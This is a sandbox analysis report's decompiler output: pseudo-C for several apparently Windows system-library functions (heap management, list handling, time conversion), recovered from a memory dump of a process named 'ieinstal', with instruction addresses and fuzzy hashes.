				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v56;
				signed int _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t66;
				signed int _t71;
				signed int _t84;
				signed int _t85;
				char* _t86;
				signed int _t87;
				signed char* _t88;
				intOrPtr _t89;
				signed int _t90;
				signed int _t108;
				void* _t109;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t138;
				signed int _t143;

				_t127 = __edx;
				_t145 = (_t143 & 0xfffffff8) - 0x24;
				_v8 =  *0x1f0bb370 ^ (_t143 & 0xfffffff8) - 0x00000024;
				_t108 = __ecx;
				_v36 = __edx;
				_v32 = __ecx;
				if(__edx <= 0x7fffffff) {
					_t127 = 1;
					_t66 = E1F089A57( &_a8, 1);
					__eflags = _t66;
					if(_t66 < 0) {
						goto L1;
					}
					_v40 = E1F08262C();
					_t135 = E1F08892E(_t108, _t69, __eflags, _a8, _a12);
					_t137 = 0;
					__eflags = _t135;
					if(_t135 != 0) {
						_t71 = _a8;
						_t117 = _a12;
						 *_t135 = _t71;
						 *((intOrPtr*)(_t135 + 4)) = _a12;
						 *((intOrPtr*)(_t135 + 8)) = 0xddeeddee;
						 *(_t135 + 0xc) = _t108;
						__eflags = _t71 - 2;
						if(_t71 >= 2) {
							_t137 = 0x10;
						}
						__eflags = _t108 & 0x04000000;
						if((_t108 & 0x04000000) != 0) {
							__eflags = _t137;
						}
						_t16 = _t135 + 0x80; // 0x80
						_t17 = _t135 + 0x200; // 0x200
						_t18 = _t135 + 0x2c0; // 0x2c0
						_t19 = _t135 + 0x100; // 0x100
						E1F08B898(_t19, _t135, _t18, _t17, _t16, _t137, _t71, _t117);
						_t21 = _t135 + 0x80; // 0x80
						_t23 = _t135 + 0x180; // 0x180
						_t119 = _t23;
						E1F08B898(_t23, _t135, 0, 0, _t21, _t137, _a8, _a12);
						 *((intOrPtr*)(_t135 + 0x40)) = 0;
						 *((intOrPtr*)(_t135 + 0x44)) = 0;
						 *((intOrPtr*)(_t135 + 0x48)) = 0;
						__eflags =  *(_t135 + 0xc) & 0x20000000;
						 *((intOrPtr*)(_t135 + 0xb4)) = 0;
						if(( *(_t135 + 0xc) & 0x20000000) != 0) {
							_t119 = 0x1f07fd00;
							 *(_t135 + 0x10) = E1F07D8FD(0x1f07fd00) & 0x0000ffff;
						}
						_t33 = _t135 + 0x100; // 0x100
						_v12 = 0;
						_v28 = 0x1f08dc60;
						_t37 = _t135 + 0x200; // 0x200
						_v24 = 0x1f08bfc0;
						_v20 = 0x1f08bec0;
						_v16 = 0x1f08bf10;
						E1F08FA89(_t37, _t33,  &_v28, _a8 & 1, _t119, 0x1f0b8a2c);
						_t41 = _t135 + 0x80; // 0x80
						_v44 = 0x1f08be70;
						_v28 = 0x1f08bea0;
						_t46 = _t135 + 0x100; // 0x100
						_t47 = _t135 + 0x2c0; // 0x2c0
						E1F086757(_t47, _t46, _v56, _a8 & 1,  &_v44, _t41, 0x1f0b8a28);
						_t127 = _v72;
						 *(_t135 + 0x54) =  *(_t135 + 0x54) & 0x00000000;
						_t84 = E1F08B927(_t46, _v72, _a4);
						__eflags = _t84;
						if(_t84 >= 0) {
							_t137 = _t135;
							_t135 = 0;
							_t85 = E1EFD3C40();
							__eflags = _t85;
							if(_t85 == 0) {
								_t86 = 0x7ffe0388;
							} else {
								_t86 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t86;
							if( *_t86 != 0) {
								_t127 =  *((intOrPtr*)(_t137 + 0xc0)) - _t137;
								__eflags =  *((intOrPtr*)(_t137 + 0xc0)) - _t137;
								E1F07D947(_t108, _t137,  *((intOrPtr*)(_t137 + 0xc0)) - _t137, _t108);
							}
							_t87 = E1EFD3C40();
							_t110 = 0x7ffe0380;
							__eflags = _t87;
							if(_t87 == 0) {
								_t88 = 0x7ffe0380;
							} else {
								_t88 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							__eflags =  *_t88;
							if( *_t88 == 0) {
								goto L28;
							} else {
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0x240) & 0x00000001;
								if(( *(_t89 + 0x240) & 0x00000001) == 0) {
									goto L28;
								}
								_t90 = E1EFD3C40();
								__eflags = _t90;
								if(_t90 != 0) {
									_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								_t127 = _v32;
								__eflags =  *((intOrPtr*)(_t137 + 0xc0)) - _t137;
								E1F07F0E5(_t110, _t137, _v32, _t135,  *((intOrPtr*)(_t137 + 0xc0)) - _t137,  *((intOrPtr*)(_t137 + 0xc0)) - _t137,  *((intOrPtr*)(_t137 + 0xbc)) - _t137,  *_t110 & 0x000000ff);
								goto L26;
							}
						} else {
							_t137 = 0;
							L26:
							__eflags = _t135;
							if(_t135 != 0) {
								E1F088E26(_t135);
							}
							L28:
							_pop(_t134);
							_pop(_t138);
							_pop(_t109);
							return E1F004B50(_t137, _t109, _v8 ^ _t145, _t127, _t134, _t138);
						}
					}
					_t127 = 0;
					E1F089A57( &_a8, 0);
					goto L28;
				}
				L1:
				_t137 = 0;
				goto L28;
			}

0x1f088bbe
0x1f088bc6
0x1f088bd0
0x1f088bd7
0x1f088bd9
0x1f088bdd
0x1f088be8
0x1f088bf6
0x1f088bf7
0x1f088bfc
0x1f088bfe
0x00000000
0x00000000
0x1f088c0a
0x1f088c18
0x1f088c1a
0x1f088c1c
0x1f088c1e
0x1f088c2f
0x1f088c32
0x1f088c35
0x1f088c37
0x1f088c3a
0x1f088c41
0x1f088c44
0x1f088c47
0x1f088c4b
0x1f088c4b
0x1f088c4c
0x1f088c52
0x1f088c54
0x1f088c54
0x1f088c5a
0x1f088c61
0x1f088c68
0x1f088c70
0x1f088c76
0x1f088c7e
0x1f088c87
0x1f088c87
0x1f088c94
0x1f088c99
0x1f088c9c
0x1f088c9f
0x1f088ca2
0x1f088ca9
0x1f088caf
0x1f088cb1
0x1f088cbe
0x1f088cbe
0x1f088cc4
0x1f088cca
0x1f088cde
0x1f088ce8
0x1f088cee
0x1f088cf6
0x1f088cfe
0x1f088d06
0x1f088d10
0x1f088d16
0x1f088d23
0x1f088d31
0x1f088d39
0x1f088d3f
0x1f088d47
0x1f088d4d
0x1f088d51
0x1f088d56
0x1f088d58
0x1f088d61
0x1f088d63
0x1f088d65
0x1f088d6a
0x1f088d6c
0x1f088d7e
0x1f088d6e
0x1f088d77
0x1f088d77
0x1f088d83
0x1f088d86
0x1f088d91
0x1f088d91
0x1f088d93
0x1f088d93
0x1f088d98
0x1f088d9d
0x1f088da2
0x1f088da4
0x1f088db6
0x1f088da6
0x1f088daf
0x1f088daf
0x1f088db8
0x1f088dbb
0x00000000
0x1f088dbd
0x1f088dbd
0x1f088dc3
0x1f088dca
0x00000000
0x00000000
0x1f088dcc
0x1f088dd1
0x1f088dd3
0x1f088dde
0x1f088dde
0x1f088dde
0x1f088de9
0x1f088dfd
0x1f088e00
0x00000000
0x1f088e00
0x1f088d5a
0x1f088d5a
0x1f088e05
0x1f088e05
0x1f088e07
0x1f088e0b
0x1f088e0b
0x1f088e10
0x1f088e16
0x1f088e17
0x1f088e18
0x1f088e23
0x1f088e23
0x1f088d58
0x1f088c20
0x1f088c25
0x00000000
0x1f088c25
0x1f088bea
0x1f088bea
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6c8e1c69163a1a11043e189edda66c6440b247818595b6b15adcd013a49b482
Instruction ID: 04ea419333d98363c9f301b8739cd90348949faecd4b358e603e7b4fb06efc14
Opcode Fuzzy Hash: e6c8e1c69163a1a11043e189edda66c6440b247818595b6b15adcd013a49b482
Instruction Fuzzy Hash: B161BCB5A00755AFD715CF24D880BABBBEAFF88710F008629F85987240DB30FA15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1F088E26 Relevance: .2, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E1F088E26(signed int __ecx) {
				signed int _v8;
				signed int _v11;
				intOrPtr _v15;
				short _v41;
				char _v47;
				intOrPtr _v48;
				signed int _v52;
				char _v55;
				signed int _v56;
				char _v60;
				intOrPtr _v63;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				signed int _t65;
				char* _t71;
				void* _t72;
				signed int _t92;
				signed int _t93;
				void* _t94;
				signed char _t96;
				intOrPtr* _t103;
				signed int _t112;
				signed int _t113;
				signed int _t119;
				signed int _t120;
				void* _t124;
				signed int _t126;
				signed int _t128;
				signed int* _t130;
				void* _t131;
				signed int _t134;
				signed int _t135;

				_t95 = __ecx;
				_t137 = (_t135 & 0xfffffff8) - 0x3c;
				_v8 =  *0x1f0bb370 ^ (_t135 & 0xfffffff8) - 0x0000003c;
				_t2 = _t95 + 0x44; // 0x44
				_t128 = _t2;
				_v56 = __ecx;
				_v60 = __ecx;
				_t59 =  *_t128;
				_v52 = _t128;
				if(( *(_t128 + 4) & 0x00000001) != 0) {
					if(_t59 == 0) {
						_t59 = 0;
					} else {
						_t59 = _t59 ^ _t128;
					}
				}
				_t96 =  *(_t128 + 4);
				_t92 = _t96 & 1;
				if(_t59 == 0) {
					L22:
					 *_t128 =  *_t128 & 0x00000000;
					 *(_t128 + 4) =  *(_t128 + 4) & 0x00000000;
					if((_t96 & 0x00000001) != 0) {
						 *(_t128 + 4) = 1;
					}
					_t122 = _v60;
					_t93 = _v60 + 0x210;
					while(1) {
						_t129 =  *_t93;
						if( *_t93 == 0) {
							break;
						}
						E1F08FD27(_t122 + 0x200, _t129 ^ _t93);
						E1F09004A(_t122 + 0x200, _t129 ^ _t93, 1);
					}
					E1F086679(_v60 + 0x2c0);
					E1F08B707();
					E1F08B707();
					_t103 = _v60;
					_v48 =  *((intOrPtr*)(_t103 + 4));
					_t65 =  *((intOrPtr*)(_t103 + 0xc0)) - _t103;
					_v52 =  *_t103;
					_v56 = _t65;
					_push( *((intOrPtr*)(_t103 + 4)));
					_push( *_t103);
					if(( *(_t103 + 0x16) & 0x00000001) == 0) {
						asm("sbb eax, eax");
						_push((_t65 & 0x01000000) + 0x8000);
						E1F088845( &_v60,  &_v56);
					} else {
						E1F089629(_t103);
					}
					E1F089A57( &_v55, 0);
					if(E1EFD3C40() == 0) {
						_t71 = 0x7ffe0388;
					} else {
						_t71 = ( *[fs:0x30])[0x14] + 0x22e;
					}
					if( *_t71 != 0) {
						E1F07D9C6(_v63);
					}
					_t72 = E1EFD3C40();
					_t130 = 0x7ffe0380;
					if(_t72 == 0) {
						_t73 = 0x7ffe0380;
					} else {
						_t73 = ( *[fs:0x30])[0x14] + 0x226;
					}
					if( *_t73 != 0) {
						_t73 =  *[fs:0x30];
						if((( *[fs:0x30])[0x90] & 0x00000001) != 0) {
							if(E1EFD3C40() != 0) {
								_t130 = ( *[fs:0x30])[0x14] + 0x226;
							}
							_v15 = _v63;
							_v41 = 0x1023;
							_push( &_v47);
							_push(4);
							_push(0x402);
							_push( *_t130 & 0x000000ff);
							_t73 = E1F002F90();
						}
					}
					_pop(_t124);
					_pop(_t131);
					_pop(_t94);
					return E1F004B50(_t73, _t94, _v11 ^ _t137, 0, _t124, _t131);
				}
				_t134 = _v56;
				while(1) {
					L6:
					_t112 =  *_t59;
					if(_t112 != 0) {
						break;
					}
					_t113 =  *(_t59 + 4);
					if(_t113 == 0) {
						_t126 =  *(_t59 + 8) & 0xfffffffc;
						if(_t92 != 0 && _t126 != 0) {
							_t126 = _t126 ^ _t59;
						}
						E1F08A464(_t92, _t113, _t59, _t134);
						if(_t126 == 0) {
							_t128 = _v52;
							_t96 =  *(_t128 + 4);
							goto L22;
						} else {
							_t59 = _t126;
							continue;
						}
					}
					_t120 = _t59;
					if(_t92 == 0) {
						_t59 = _t113;
					} else {
						_t59 = _t59 ^ _t113;
					}
					 *(_t120 + 4) =  *(_t120 + 4) & 0x00000000;
				}
				_t119 = _t59;
				if(_t92 == 0) {
					_t59 = _t112;
				} else {
					_t59 = _t59 ^ _t112;
				}
				 *_t119 =  *_t119 & 0x00000000;
				goto L6;
			}

0x1f088e26
0x1f088e2e
0x1f088e38
0x1f088e3e
0x1f088e3e
0x1f088e41
0x1f088e45
0x1f088e4d
0x1f088e50
0x1f088e54
0x1f088e58
0x1f088e5e
0x1f088e5a
0x1f088e5a
0x1f088e5a
0x1f088e58
0x1f088e60
0x1f088e66
0x1f088e6b
0x1f088ec7
0x1f088ec7
0x1f088eca
0x1f088ed1
0x1f088ed3
0x1f088ed3
0x1f088ed7
0x1f088edb
0x1f088ee1
0x1f088ee1
0x1f088ee5
0x00000000
0x00000000
0x1f088ef1
0x1f088f00
0x1f088f00
0x1f088f11
0x1f088f20
0x1f088f2f
0x1f088f34
0x1f088f3d
0x1f088f47
0x1f088f49
0x1f088f4d
0x1f088f55
0x1f088f58
0x1f088f5a
0x1f088f6e
0x1f088f7a
0x1f088f7b
0x1f088f5c
0x1f088f5c
0x1f088f5c
0x1f088f86
0x1f088f92
0x1f088fa4
0x1f088f94
0x1f088f9d
0x1f088f9d
0x1f088fac
0x1f088fb2
0x1f088fb2
0x1f088fb7
0x1f088fbc
0x1f088fc8
0x1f088fd7
0x1f088fca
0x1f088fd3
0x1f088fd3
0x1f088fdc
0x1f088fde
0x1f088feb
0x1f088ff4
0x1f088fff
0x1f088fff
0x1f089007
0x1f089010
0x1f089019
0x1f08901a
0x1f08901c
0x1f089024
0x1f089025
0x1f089025
0x1f088feb
0x1f08902e
0x1f08902f
0x1f089030
0x1f08903b
0x1f08903b
0x1f088e6d
0x1f088e71
0x1f088e71
0x1f088e71
0x1f088e75
0x00000000
0x00000000
0x1f088e88
0x1f088e8d
0x1f088ea4
0x1f088ea9
0x1f088eaf
0x1f088eaf
0x1f088eb3
0x1f088eba
0x1f088ec0
0x1f088ec4
0x00000000
0x1f088ebc
0x1f088ebc
0x00000000
0x1f088ebc
0x1f088eba
0x1f088e8f
0x1f088e93
0x1f088e99
0x1f088e95
0x1f088e95
0x1f088e95
0x1f088e9b
0x1f088e9b
0x1f088e77
0x1f088e7b
0x1f088e81
0x1f088e7d
0x1f088e7d
0x1f088e7d
0x1f088e83
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e7923986dfa75b581f16d9938d11273f0e4e99699cf38b1acf54dea4680885e
Instruction ID: 9e073ded3139a554f057c2e81fdd0eeea7ff2f2da808712697c337f335ddc5cc
Opcode Fuzzy Hash: 8e7923986dfa75b581f16d9938d11273f0e4e99699cf38b1acf54dea4680885e
Instruction Fuzzy Hash: B661FE35A047828FD301CF24D894BAAB7E2BF80718F15496DEC858B291EB35FA05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEECF3 Relevance: .2, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E1EFEECF3(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t62;
				intOrPtr _t69;
				void* _t72;
				intOrPtr* _t76;
				signed int _t89;
				void* _t91;
				intOrPtr* _t94;
				intOrPtr* _t99;
				intOrPtr _t104;
				intOrPtr* _t105;
				signed int _t109;
				void* _t114;
				void* _t123;

				_push(__ecx);
				_push(__ecx);
				_t50 =  *0x1f0b664c; // 0x333c1b8
				_v12 = __edx;
				_t89 = 0;
				_t109 = __ecx;
				_v8 = _v8 & 0;
				L1EFC53C0(_t50 + 4);
				_t104 =  *0x1f0b664c; // 0x333c1b8
				_t105 = _t104 + 8;
				_t94 =  *_t105;
				while(_t94 != _t105) {
					_t114 = _t94 - 0x1c;
					_t62 =  *((intOrPtr*)(_t109 + 0xc));
					if( *((intOrPtr*)(_t114 + 0x10)) !=  *((intOrPtr*)(_t109 + 8)) ||  *((intOrPtr*)(_t114 + 0x14)) != _t62 ||  *((intOrPtr*)(_t114 + 8)) !=  *_t109) {
						L20:
						_t94 =  *_t94;
						continue;
					} else {
						_t64 =  *((intOrPtr*)(_t114 + 0xc));
						if( *((intOrPtr*)(_t114 + 0xc)) !=  *((intOrPtr*)(_t109 + 4))) {
							goto L20;
						}
						_t12 = _t114 + 0x28; // 0x28
						_t91 = _t12;
						L1EFD2330(_t64, _t91);
						if( *(_t114 + 0x5c) == 2) {
							__eflags = _v12;
							if(_v12 == 0) {
								E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *(_t114 + 0x58));
								 *(_t114 + 0x58) =  *(_t114 + 0x58) & 0x00000000;
								 *(_t114 + 0x5c) =  *(_t114 + 0x5c) & 0x00000000;
								L8:
								asm("lock inc dword [esi+0x50]");
								 *(_t114 + 0x5c) = 1;
								E1EFD24D0(_t91);
								_t69 =  *0x1f0b664c; // 0x333c1b8
								_t123 = _t69 + 4;
								E1EFC52F0(_t94, _t69 + 4);
								while(1) {
									_t92 = 0;
									_t72 = E1EFEEE48(0, _t109, _t114, _t109, _t114, _t123, 0);
									_t124 = _t72 - 0xc000022d;
									if(_t72 == 0xc000022d) {
										_t92 = 0xc000022d;
									}
									if(E1EFEEE48(_t92, _t109, _t114, _t109, _t114, _t124, 1) == 0xc000022d) {
										_t89 = 0xc000022d;
									}
									_t16 = _t114 + 0x28; // 0x28
									L1EFD2330(_t16, _t16);
									_v8 = _v8 + 1;
									_t19 = _t114 + 0x2c; // 0x2c
									_t99 = _t19;
									_t76 =  *_t99;
									while(_t76 != _t99) {
										 *(_t76 + 0x60) =  *(_t76 + 0x60) & 0x00000000;
										_t76 =  *_t76;
									}
									if( *(_t114 + 0x58) != 0) {
										_t109 =  *(_t114 + 0x58);
										_t42 = _t114 + 0x28; // 0x28
										 *(_t114 + 0x58) =  *(_t114 + 0x58) & 0x00000000;
										E1EFD24D0(_t42);
										continue;
									}
									if(_t89 != 0) {
										__eflags = _t89 - 0xc000022d;
										if(_t89 == 0xc000022d) {
											 *(_t114 + 0x58) = _t109;
											 *(_t114 + 0x5c) = 2;
											E1F04C41F(_t114);
										}
										L17:
										_t26 = _t114 + 0x28; // 0x28
										E1EFD24D0(_t26);
										L1EFEEC45(_t114);
										L18:
										if(_v8 > 1) {
											_t47 = _t109 + 8; // 0xb
											_push(0);
											_push(0);
											_push(_t89);
											_push( *((intOrPtr*)(_t109 + 0x18)));
											_push(_t109);
											E1F0038C0();
											__eflags = _t89;
											if(_t89 == 0) {
												E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
											}
											_t89 = 0x80;
										}
										return _t89;
									}
									 *(_t114 + 0x5c) =  *(_t114 + 0x5c) & _t89;
									if( *((intOrPtr*)(_t114 + 0x18)) != _t89) {
										__eflags =  *((intOrPtr*)(_t109 + 0x10)) -  *((intOrPtr*)(_t114 + 0x18));
										if( *((intOrPtr*)(_t109 + 0x10)) -  *((intOrPtr*)(_t114 + 0x18)) > 0) {
											goto L16;
										}
										goto L17;
									}
									L16:
									 *((intOrPtr*)(_t114 + 0x18)) =  *((intOrPtr*)(_t109 + 0x10));
									goto L17;
								}
							}
							_push(_t91);
							L27:
							E1EFD24D0();
							_t89 = 0x80;
							break;
						}
						if( *(_t114 + 0x5c) == 1) {
							__eflags = _v12;
							_push(_t91);
							if(_v12 != 0) {
								goto L27;
							}
							 *(_t114 + 0x58) = _t109;
							E1EFD24D0();
							_t89 = 0x103;
							break;
						}
						goto L8;
					}
				}
				_t53 =  *0x1f0b664c; // 0x333c1b8
				E1EFC52F0(_t94, _t53 + 4);
				goto L18;
			}

0x1efeecf8
0x1efeecf9
0x1efeecfa
0x1efeed05
0x1efeed08
0x1efeed0a
0x1efeed0c
0x1efeed10
0x1efeed15
0x1efeed1b
0x1efeed1e
0x1efeed20
0x1efeed2b
0x1efeed31
0x1efeed34
0x1efeee1d
0x1efeee1d
0x00000000
0x1efeed4e
0x1efeed4e
0x1efeed54
0x00000000
0x00000000
0x1efeed5a
0x1efeed5a
0x1efeed5e
0x1efeed67
0x1f02fc5b
0x1f02fc5f
0x1f02fc7f
0x1f02fc84
0x1f02fc88
0x1efeed77
0x1efeed77
0x1efeed7c
0x1efeed83
0x1efeed88
0x1efeed8d
0x1efeed91
0x1efeed96
0x1efeed96
0x1efeed9d
0x1efeeda7
0x1efeeda9
0x1f02fcaa
0x1f02fcaa
0x1efeedc1
0x1f02fcb1
0x1f02fcb1
0x1efeedc7
0x1efeedcb
0x1efeedd0
0x1efeedd3
0x1efeedd3
0x1efeedd6
0x1efeedd8
0x1efeee24
0x1efeee28
0x1efeee28
0x1efeede0
0x1f02fcb8
0x1f02fcbb
0x1f02fcbe
0x1f02fcc3
0x00000000
0x1f02fcc3
0x1efeede8
0x1f02fcd2
0x1f02fcd4
0x1f02fcdc
0x1f02fcdf
0x1f02fce6
0x1f02fce6
0x1efeedfc
0x1efeedfc
0x1efeee00
0x1efeee07
0x1efeee0c
0x1efeee10
0x1f02fcf2
0x1f02fcf5
0x1f02fcf6
0x1f02fcf7
0x1f02fcf8
0x1f02fcfb
0x1f02fcfd
0x1f02fd02
0x1f02fd04
0x1f02fd11
0x1f02fd11
0x1f02fd16
0x1f02fd16
0x1efeee1c
0x1efeee1c
0x1efeedee
0x1efeedf4
0x1efeee32
0x1efeee34
0x00000000
0x00000000
0x00000000
0x1efeee36
0x1efeedf6
0x1efeedf9
0x00000000
0x1efeedf9
0x1efeed96
0x1f02fc61
0x1f02fc62
0x1f02fc62
0x1f02fc67
0x00000000
0x1f02fc67
0x1efeed71
0x1f02fc91
0x1f02fc95
0x1f02fc96
0x00000000
0x00000000
0x1f02fc98
0x1f02fc9b
0x1f02fca0
0x00000000
0x1f02fca0
0x00000000
0x1efeed71
0x1efeed34
0x1efeee38
0x1efeee41
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be826203803afbff267d356ac5bdd4a4ea45c4741f0abbaa9082d6bc5149455
Instruction ID: 6935a1f46a7dca74afe5b234802861737c5f4896b3f9281bdeed417427144130
Opcode Fuzzy Hash: 3be826203803afbff267d356ac5bdd4a4ea45c4741f0abbaa9082d6bc5149455
Instruction Fuzzy Hash: AE51F176200781DFD720DF5AD8A0A5BB7E9FF44319F514A6EE84287A00CB74F885CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFECD10 Relevance: .2, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E1EFECD10(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v44;
				short _v46;
				char _v56;
				signed int _t69;
				intOrPtr* _t70;
				signed int _t71;
				signed int _t75;
				signed int _t91;
				signed int _t92;
				void* _t93;
				signed int _t95;
				signed int _t98;
				void* _t99;
				signed int _t104;
				char* _t106;
				signed int _t108;
				signed int _t109;
				char* _t112;
				intOrPtr _t115;
				intOrPtr _t119;
				char _t120;

				_t106 =  *((intOrPtr*)( *[fs:0x30] + 0x470));
				if(_t106 == 0 ||  *_t106 == 0) {
					return E1EFECDE3(_a4, _a8, __eflags);
				} else {
					_v28 =  *((intOrPtr*)(_t106 + 4));
					asm("lock or [eax], ecx");
					_t69 = _a12;
					_t104 =  *( *[fs:0x30] + 0x474) & 0x00000001;
					_v12 = _t104;
					if(_t69 != 0) {
						_v16 =  *_t69;
						_v20 =  *((intOrPtr*)(_t69 + 4));
					} else {
						_v16 = _v16 & _t69;
						_v20 = _v20 & _t69;
					}
					_t70 = _a4;
					_t91 = 0x989680;
					_t119 =  *_t70;
					_t115 =  *((intOrPtr*)(_t70 + 4));
					_t71 = 0;
					_v24 = _v24 & 0;
					_v8 = 0;
					if(_v28 > 0) {
						_t108 = _t106 + 8;
						__eflags = _t108;
						_v12 = _t104;
						_v12 = _t108;
						do {
							_t92 =  *_t108;
							_t109 =  *(_t108 + 4);
							__eflags = _t109;
							if(__eflags < 0) {
								L30:
								_t93 = _t92 - _v16;
								asm("sbb edx, [ebp-0x10]");
								__eflags = _t115 - (_t109 & 0x7fffffff);
								if(__eflags < 0) {
									break;
								}
								if(__eflags > 0) {
									L33:
									_t71 = _t71 - 1;
									__eflags = _t71;
									L34:
									_v8 = _t71;
									goto L35;
								}
								__eflags = _t119 - _t93;
								if(__eflags < 0) {
									break;
								}
								goto L33;
							}
							if(__eflags > 0) {
								L17:
								_t99 = _t92 - _v16;
								asm("sbb edx, [ebp-0x10]");
								_v32 = _t99 + 0x1312d00;
								asm("adc eax, 0x0");
								__eflags = _t115 - _t109;
								if(__eflags < 0) {
									L21:
									_v32 = _t99 + 0x989680;
									asm("adc eax, 0x0");
									__eflags = _t115 - _t109;
									if(__eflags < 0) {
										L25:
										__eflags = _t115 - _t109;
										if(__eflags < 0) {
											break;
										}
										if(__eflags > 0) {
											L28:
											_t104 = _t104 | 0x00000004;
											__eflags = _t104;
											L29:
											_t71 = _v8;
											goto L35;
										}
										__eflags = _t119 - _t99;
										if(__eflags < 0) {
											break;
										}
										goto L28;
									}
									if(__eflags > 0) {
										L24:
										_t104 = _t104 | 0x00000002;
										goto L29;
									}
									__eflags = _t119 - _v32;
									if(_t119 < _v32) {
										goto L25;
									}
									goto L24;
								}
								if(__eflags > 0) {
									L20:
									_t71 = _v8 + 1;
									goto L34;
								}
								__eflags = _t119 - _v32;
								if(_t119 < _v32) {
									goto L21;
								}
								goto L20;
							}
							__eflags = _t92;
							if(_t92 < 0) {
								goto L30;
							}
							goto L17;
							L35:
							_t98 = _v24 + 1;
							_t108 = _v12 + 8;
							_v24 = _t98;
							_v12 = _t108;
							__eflags = _t98 - _v28;
						} while (__eflags < 0);
						_t71 = _v8;
						_t91 = 0x989680;
						_v12 = _t104;
						goto L5;
					} else {
						L5:
						_t120 = _t119 - _t71 * _t91;
						_v40 = _t120;
						asm("sbb edi, edx");
						_v36 = _t115;
						_t95 = _t104 & 0x00000002;
						_t131 = _t95;
						if(_t95 != 0) {
							_v40 = _t120 - 0x989680;
							asm("sbb edi, 0x0");
							_v36 = _t115;
						}
						_t112 =  &_v56;
						E1EFECDE3( &_v40, _t112, _t131);
						_t75 = _v12;
						if((_t75 & 0x00000001) != 0) {
							__eflags = _t95;
							if(_t95 != 0) {
								_v46 = _v46 + 1;
							}
						} else {
							if((_t75 & 0x00000004) != 0) {
								asm("cdq");
								_t75 = _v44 - _t112 >> 1;
								_v44 = _t75;
							} else {
								_t75 = _v44;
							}
							if(_t95 != 0) {
								asm("cdq");
								_t75 = (_t75 - _t112 >> 1) + 0x1f4;
								_v44 = _t75;
							}
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						return _t75;
					}
				}
			}

0x1efecd1e
0x1efecd26
0x00000000
0x1efecd35
0x1efecd3c
0x1efecd43
0x1efecd4d
0x1efecd56
0x1efecd59
0x1efecd5e
0x1efecdd8
0x1efecdde
0x1efecd60
0x1efecd60
0x1efecd63
0x1efecd63
0x1efecd66
0x1efecd69
0x1efecd6e
0x1efecd70
0x1efecd73
0x1efecd75
0x1efecd78
0x1efecd7e
0x1f02e9f6
0x1f02e9f6
0x1f02e9f9
0x1f02e9fc
0x1f02e9ff
0x1f02e9ff
0x1f02ea01
0x1f02ea04
0x1f02ea06
0x1f02ea65
0x1f02ea6b
0x1f02ea6e
0x1f02ea71
0x1f02ea73
0x00000000
0x00000000
0x1f02ea75
0x1f02ea7b
0x1f02ea7b
0x1f02ea7b
0x1f02ea7c
0x1f02ea7c
0x00000000
0x1f02ea7c
0x1f02ea77
0x1f02ea79
0x00000000
0x00000000
0x00000000
0x1f02ea79
0x1f02ea08
0x1f02ea0e
0x1f02ea0e
0x1f02ea13
0x1f02ea1b
0x1f02ea20
0x1f02ea23
0x1f02ea25
0x1f02ea34
0x1f02ea3b
0x1f02ea40
0x1f02ea43
0x1f02ea45
0x1f02ea53
0x1f02ea53
0x1f02ea55
0x00000000
0x00000000
0x1f02ea57
0x1f02ea5d
0x1f02ea5d
0x1f02ea5d
0x1f02ea60
0x1f02ea60
0x00000000
0x1f02ea60
0x1f02ea59
0x1f02ea5b
